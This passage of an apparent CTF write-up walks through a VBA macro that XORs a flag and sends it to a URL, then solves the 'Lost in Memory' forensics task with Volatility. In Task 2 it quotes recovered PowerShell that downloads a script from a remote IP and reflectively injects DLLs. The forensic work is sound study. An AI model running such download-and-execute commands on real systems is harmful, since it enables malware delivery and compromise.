loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/19924c6be572a5859fdee210bd3f69e4/a5a94/image-20240711072320426.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.499999999999996%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8UlEQVQY032P626DMAyFef+nW7t1dKwdExu0lEAhdi6QljMn0qr9WqSjfHbs4zgbTIdf9XzBaBUa9YXy+4Bh7KFpguYJbBlktLAGG0pMwpSY5J2k/oosGrVUQ9kzRq9wojOe2x2OQ54a9aSTjDFg4iRrLJglZk63tQ7zPCOEgOzzWmB7ylGoF1TTOw4qx+6ywcewhxrUo3CJWhZ4iWMu8vyHo7quQ1ZTKUYlovG+e8Kb2qDotzj2r3CyhpPplgjBezj5pRGOzXGIcw5e8pGjsdYamQsW/iYrzBrNVKHRFVqu0dsWt3vAuq5Y7/eHJIH/zg8Zen8CJzI/RQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/19924c6be572a5859fdee210bd3f69e4/8ac56/image-20240711072320426.webp 240w,\n/static/19924c6be572a5859fdee210bd3f69e4/d3be9/image-20240711072320426.webp 480w,\n/static/19924c6be572a5859fdee210bd3f69e4/e46b2/image-20240711072320426.webp 960w,\n/static/19924c6be572a5859fdee210bd3f69e4/f992d/image-20240711072320426.webp 1440w,\n/static/19924c6be572a5859fdee210bd3f69e4/5a7dd/image-20240711072320426.webp 1657w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/19924c6be572a5859fdee210bd3f69e4/8ff5a/image-20240711072320426.png 240w,\n/static/19924c6be572a5859fdee210bd3f69e4/e85cb/image-20240711072320426.png 480w,\n/static/19924c6be572a5859fdee210bd3f69e4/d9199/image-20240711072320426.png 960w,\n/static/19924c6be572a5859fdee210bd3f69e4/07a9c/image-20240711072320426.png 1440w,\n/static/19924c6be572a5859fdee210bd3f69e4/a5a94/image-20240711072320426.png 1657w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/19924c6be572a5859fdee210bd3f69e4/d9199/image-20240711072320426.png\"\n            alt=\"image-20240711072320426\"\n            title=\"image-20240711072320426\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>If you arrange the packets chronologically, this byte sequence appears in the second-to-last request.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/bbdb4/image-20240711072421273.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 14.583333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsUlEQVQI122OXQ+BcBjF+/7fQMYmm5vYjFp6EaK8lJla5kIbwoUimwvMy/EvcuXit+fsOc/OeSi2mQGr0qi0syi3aFS7OXD9AuRJCYLJoGEVwQ8Y1PR8on8QT/gDZR8kOJGM+VmFc5Th3TQsLh0EGGMPCyGZq4ee7NZPAzsME1Iv+JJqarSpw9xymAYirB2P2UmBGynwX0YS5JOQuMwORYKE+AGX3MQFXsxV+0D08t7DG4V2zVp3Gx20AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/8ac56/image-20240711072421273.webp 240w,\n/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/d3be9/image-20240711072421273.webp 480w,\n/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/e46b2/image-20240711072421273.webp 960w,\n/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/f992d/image-20240711072421273.webp 1440w,\n/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/8fda2/image-20240711072421273.webp 1805w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/8ff5a/image-20240711072421273.png 240w,\n/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/e85cb/image-20240711072421273.png 480w,\n/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/d9199/image-20240711072421273.png 960w,\n/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/07a9c/image-20240711072421273.png 1440w,\n/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/bbdb4/image-20240711072421273.png 1805w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/d9199/image-20240711072421273.png\"\n            alt=\"image-20240711072421273\"\n            title=\"image-20240711072421273\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This is the value generated by the following code, and it seems very likely that it is the encrypted flag.</p>\n<p>Here, the flag obtained from the sheet is most likely being XORed with some key by the <code class=\"language-text\">doThing</code> function.</p>\n<div class=\"gatsby-highlight\" data-language=\"visualbasic\"><pre class=\"language-visualbasic\"><code class=\"language-visualbasic\">Q = &quot;Flag: &quot; &amp; valueA1\n***\nW = S + G + D + F\nO = doThing(Q, W)\n***\nZ = forensics(O)\n***\nT = totalyFine(Z)\nMsgBox T\nJ = &quot;http://downunderctf.com/&quot; + T\nsuperThing (J)</code></pre></div>\n<p>Also, the XOR key used here, <code class=\"language-text\">S + G + D + F</code>, is written in plaintext without any trick, so I was able to get the flag directly.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/862072f3713f5cfe095b879752c49788/e72de/image-20240711204449070.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 47.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABWUlEQVQoz5WSC2+CMBSF+f9/zeg2wLeCCq0WSnm0tGDUM4qRZVuW6U1ODm1uv3soOLkUUEZCatm5gigzrIMlYhohExm00f/K9hFK4HounJ1Y41hRkDLuxSQFLfeg+QFKKrRti6ZpBrcyxgzPj/XlcgEhBE7ZCqSS4VQRnGQEoRPkDUfWeWOavvF6vQ6y68fewx/DoiiC455GWAkPa+7DJSN4bIwF/8A+3yBhKZRSfQKtde8/E5/PZwghQClFEARwZskb5uk7tmKGZeJiyT2sMg9xGcJog7quB6AF2Lrdbt9kU9pijMFZ8xmo2mNXrLDJpgjyOVbcAgM8WxY6AHnNINsCcR7CP427tB+YJpM78PY7zV8agHEVgMoQcRUiKreIik4d7FhF9+n4OvBUwi0Nuy+cgive/TIERByQa47C8KHxJaDPJlikbn93QTFHWCywEX6fuH/lFxN+AilN/31gjvbNAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/862072f3713f5cfe095b879752c49788/8ac56/image-20240711204449070.webp 240w,\n/static/862072f3713f5cfe095b879752c49788/d3be9/image-20240711204449070.webp 480w,\n/static/862072f3713f5cfe095b879752c49788/e46b2/image-20240711204449070.webp 960w,\n/static/862072f3713f5cfe095b879752c49788/40d0b/image-20240711204449070.webp 1198w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/862072f3713f5cfe095b879752c49788/8ff5a/image-20240711204449070.png 240w,\n/static/862072f3713f5cfe095b879752c49788/e85cb/image-20240711204449070.png 480w,\n/static/862072f3713f5cfe095b879752c49788/d9199/image-20240711204449070.png 960w,\n/static/862072f3713f5cfe095b879752c49788/e72de/image-20240711204449070.png 1198w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/862072f3713f5cfe095b879752c49788/d9199/image-20240711204449070.png\"\n            alt=\"image-20240711204449070\"\n            title=\"image-20240711204449070\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"lost-in-memoryforensic\" style=\"position:relative;\"><a href=\"#lost-in-memoryforensic\" aria-label=\"lost in memoryforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Lost in Memory(Forensic)</h2>\n<blockquote>\n<p>Looks like one of our Emu soldiers ran something on an Outpost machine and now it’s doing strange things. We took a memory dump as a precaution. Can you tell us whats going on?</p>\n<p>This challenge has four parts to combine into the final flag with <code class=\"language-text\">_</code> between each answer. Find all four answers and combine them into the flag as all lower case like <code class=\"language-text\">DUCTF{answer1_answer2_answer3_answer4}</code> eg. <code class=\"language-text\">DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}</code></p>\n<ol>\n<li>What was the name of the malicious executable? eg <code class=\"language-text\">malicious.xlsm</code></li>\n<li>What was the name of the powershell module used? eg <code class=\"language-text\">invoke-mimikatz</code></li>\n<li>What were the names of the two files executed from the malicious executable (In alphabetical order with - in between and no spaces)? eg <code class=\"language-text\">malware.exe-malware2.exe</code></li>\n<li>What was the password of the new account created through powershell? eg <code class=\"language-text\">strong-password123</code></li>\n</ol>\n</blockquote>\n<p>The challenge provides a memory dump as the artifact.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a61f1acca77ddb39900acffc58e41ce5/6aacb/image-20240711211954638.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 39.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA50lEQVQoz52S3Y6CMBBG+zSrK6wgPxatgKWywIJGidk1Gt//MT6dMRiNF4a9OOmkk5x+01aYqkayKjDXDZwoR6gMpMqg0gKTMGZsN8LHyMPA8t8iYl1hFueIrhLblbAcyQJaP79CZjSevkD9R2hvaAcQZbPnNJKTGbjBAmNvzsmo9qYJ06Xtal+mT7i+YqnYtEfEuoTO1yjqFuFMs5BOozH7wCOvdwckWQWVfLOoG4eE/0G0v2ekpsZy1XA6ktFJ1BxYN3oJKaEpNlgsS36cbtRHaS/hdn9Cs/1Dmv3cvwpdvO1Ed2kfLh3IAAUsS4f9AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a61f1acca77ddb39900acffc58e41ce5/8ac56/image-20240711211954638.webp 240w,\n/static/a61f1acca77ddb39900acffc58e41ce5/d3be9/image-20240711211954638.webp 480w,\n/static/a61f1acca77ddb39900acffc58e41ce5/e46b2/image-20240711211954638.webp 960w,\n/static/a61f1acca77ddb39900acffc58e41ce5/c4443/image-20240711211954638.webp 1347w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a61f1acca77ddb39900acffc58e41ce5/8ff5a/image-20240711211954638.png 240w,\n/static/a61f1acca77ddb39900acffc58e41ce5/e85cb/image-20240711211954638.png 480w,\n/static/a61f1acca77ddb39900acffc58e41ce5/d9199/image-20240711211954638.png 960w,\n/static/a61f1acca77ddb39900acffc58e41ce5/6aacb/image-20240711211954638.png 1347w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a61f1acca77ddb39900acffc58e41ce5/d9199/image-20240711211954638.png\"\n            alt=\"image-20240711211954638\"\n            title=\"image-20240711211954638\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It seems that you can get the flag by analyzing this dump and finding four keywords.</p>\n<h3 id=\"task-1\" style=\"position:relative;\"><a href=\"#task-1\" aria-label=\"task 1 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Task 1</h3>\n<p>First, I needed to find the suspicious executable.</p>\n<p>For now, I scanned the processes with <code class=\"language-text\">vol3 -f ./EMU-OUTPOST.raw windows.psscan</code>.</p>\n<p>The process scan did not reveal anything suspicious, but when I checked the command lines with <code class=\"language-text\">vol3 -f ./EMU-OUTPOST.raw windows.cmdline.CmdLine</code>, I found suspicious files such as <code class=\"language-text\">C:\\Users\\emu\\Desktop\\Monke\\Monke.xlsm</code> and <code class=\"language-text\">C:\\Users\\emu\\Downloads\\monkey.doc.ps1</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bc780c016a93be7ca39f69e2d88b3dfc/89048/image-20240711212240659.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15.833333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsUlEQVQI11WP2Q6CQAxF+RmNGkIAUYZFQBgY9mFTcIn//xdXZh5MfLhpk56etEqcNUhYC8o4iE/BxyfyekLNZxTNJPu06FeGg+YcEa1gngPolg/NdLFTrb8oEa0lHMSlFPa3N5puQdMvYOUAVo2ouxlZ2Uux4CwSQTMcqDrBZm/8sj2YQljJJXGlG6QY7h+0wwPd9JJVzNKig/gkTEo4l3TlMnghA/ESnJyrjO3FONohvpYtapETUtLPAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bc780c016a93be7ca39f69e2d88b3dfc/8ac56/image-20240711212240659.webp 240w,\n/static/bc780c016a93be7ca39f69e2d88b3dfc/d3be9/image-20240711212240659.webp 480w,\n/static/bc780c016a93be7ca39f69e2d88b3dfc/e46b2/image-20240711212240659.webp 960w,\n/static/bc780c016a93be7ca39f69e2d88b3dfc/a3537/image-20240711212240659.webp 1242w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bc780c016a93be7ca39f69e2d88b3dfc/8ff5a/image-20240711212240659.png 240w,\n/static/bc780c016a93be7ca39f69e2d88b3dfc/e85cb/image-20240711212240659.png 480w,\n/static/bc780c016a93be7ca39f69e2d88b3dfc/d9199/image-20240711212240659.png 960w,\n/static/bc780c016a93be7ca39f69e2d88b3dfc/89048/image-20240711212240659.png 1242w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bc780c016a93be7ca39f69e2d88b3dfc/d9199/image-20240711212240659.png\"\n            alt=\"image-20240711212240659\"\n            title=\"image-20240711212240659\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"task-2\" style=\"position:relative;\"><a href=\"#task-2\" aria-label=\"task 2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Task 2</h3>\n<p>Next, I needed to identify the suspicious PowerShell module that had been loaded.</p>\n<p>For now, I dumped the PowerShell processes.</p>\n<p>There are the following three processes.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4e09287acf49c9faefe9913c1860d766/20c85/image-20240711220253029.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 7.916666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAgElEQVQI1yXNWw6CMBSEYdZkIA1yKVgQKIW2Qbyy/238HuPDl3mamUQXLefSkjULzXIwReE2zLDiwoNw+zD7O8O80duIGz22nRiEEWku/fpKof8SqzTmlKNUjfM7UQZceEoeLPGF396skr9x3TnCxeKyij4tqYSqOkY502bGrjtfKK1JnXEg3IAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4e09287acf49c9faefe9913c1860d766/8ac56/image-20240711220253029.webp 240w,\n/static/4e09287acf49c9faefe9913c1860d766/d3be9/image-20240711220253029.webp 480w,\n/static/4e09287acf49c9faefe9913c1860d766/e46b2/image-20240711220253029.webp 960w,\n/static/4e09287acf49c9faefe9913c1860d766/5375e/image-20240711220253029.webp 999w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4e09287acf49c9faefe9913c1860d766/8ff5a/image-20240711220253029.png 240w,\n/static/4e09287acf49c9faefe9913c1860d766/e85cb/image-20240711220253029.png 480w,\n/static/4e09287acf49c9faefe9913c1860d766/d9199/image-20240711220253029.png 960w,\n/static/4e09287acf49c9faefe9913c1860d766/20c85/image-20240711220253029.png 999w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4e09287acf49c9faefe9913c1860d766/d9199/image-20240711220253029.png\"\n            alt=\"image-20240711220253029\"\n            title=\"image-20240711220253029\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I dumped the processes with the following commands.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">vol3 -o /tmp -f ./EMU-OUTPOST.raw windows.memmap --dump --pid <span class=\"token number\">1136</span>\nvol3 -o /tmp -f ./EMU-OUTPOST.raw windows.memmap --dump --pid <span class=\"token number\">3268</span>\nvol3 -o /tmp -f ./EMU-OUTPOST.raw windows.memmap --dump --pid <span class=\"token number\">2520</span></code></pre></div>\n<p>When I analyzed the dump of PID 1136 among these, I confirmed that the following code was being executed: <code class=\"language-text\">Start-Job -ScriptBlock {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/emu.dll};Start-Job -ScriptBlock {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/kiwi.dll}</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0247912650003b9b4d6126f3b05fbd65/9b1e2/image-20240711220602875.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 5.416666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAATUlEQVQI1xXHOw6AIBAAUa9kQWFhFMEVkF9Q4/1PMkoxyZvBl4bEiz29+PQQ8sNZum+sq38Fc2TWRTDaIb6y9bcRIxkJjcUE1KQZ1cwH2YEk1RopY7MAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0247912650003b9b4d6126f3b05fbd65/8ac56/image-20240711220602875.webp 240w,\n/static/0247912650003b9b4d6126f3b05fbd65/d3be9/image-20240711220602875.webp 480w,\n/static/0247912650003b9b4d6126f3b05fbd65/e46b2/image-20240711220602875.webp 960w,\n/static/0247912650003b9b4d6126f3b05fbd65/f992d/image-20240711220602875.webp 1440w,\n/static/0247912650003b9b4d6126f3b05fbd65/17f0a/image-20240711220602875.webp 1880w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0247912650003b9b4d6126f3b05fbd65/8ff5a/image-20240711220602875.png 240w,\n/static/0247912650003b9b4d6126f3b05fbd65/e85cb/image-20240711220602875.png 480w,\n/static/0247912650003b9b4d6126f3b05fbd65/d9199/image-20240711220602875.png 960w,\n/static/0247912650003b9b4d6126f3b05fbd65/07a9c/image-20240711220602875.png 1440w,\n/static/0247912650003b9b4d6126f3b05fbd65/9b1e2/image-20240711220602875.png 1880w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0247912650003b9b4d6126f3b05fbd65/d9199/image-20240711220602875.png\"\n            alt=\"image-20240711220602875\"\n            title=\"image-20240711220602875\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"task-3\" style=\"position:relative;\"><a href=\"#task-3\" aria-label=\"task 3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Task 3</h3>\n<p>Next, I had to identify the two files called from the malicious executable.</p>\n<p>To be honest, this part required some guessing, but <code class=\"language-text\">emu.dll</code>, <code class=\"language-text\">monkey.dll</code>, and <code class=\"language-text\">kiwi.dll</code>, which appeared in the grep results above, looked like candidate answers.</p>\n<h3 id=\"task-4\" style=\"position:relative;\"><a href=\"#task-4\" aria-label=\"task 4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Task 4</h3>\n<p>Finally, I needed to identify the password of the account that had been created.</p>\n<p>I was completely stuck here, but after reading the writeup, it seems that by searching the PowerShell process dump for places where further PowerShell commands were being issued, it was possible to obtain obfuscated code.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/665cf653902e853a253e48593eee6464/7e11a/image-20240712000616138.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 7.083333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAS0lEQVQI1x2KSw6AIAwFvZIxxPijCNJCjRHvf5hnw2I2MzNcoUDkRTIo3VD9wPwg14aNBKtn5NJ6i+Z9VKPCLad1xh6kf9NMGN2BH6UFI6jOUJqOAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/665cf653902e853a253e48593eee6464/8ac56/image-20240712000616138.webp 240w,\n/static/665cf653902e853a253e48593eee6464/d3be9/image-20240712000616138.webp 480w,\n/static/665cf653902e853a253e48593eee6464/e46b2/image-20240712000616138.webp 960w,\n/static/665cf653902e853a253e48593eee6464/9c746/image-20240712000616138.webp 1235w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/665cf653902e853a253e48593eee6464/8ff5a/image-20240712000616138.png 240w,\n/static/665cf653902e853a253e48593eee6464/e85cb/image-20240712000616138.png 480w,\n/static/665cf653902e853a253e48593eee6464/d9199/image-20240712000616138.png 960w,\n/static/665cf653902e853a253e48593eee6464/7e11a/image-20240712000616138.png 1235w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/665cf653902e853a253e48593eee6464/d9199/image-20240712000616138.png\"\n            alt=\"image-20240712000616138\"\n            title=\"image-20240712000616138\"\n            loading=\"lazy\"\n            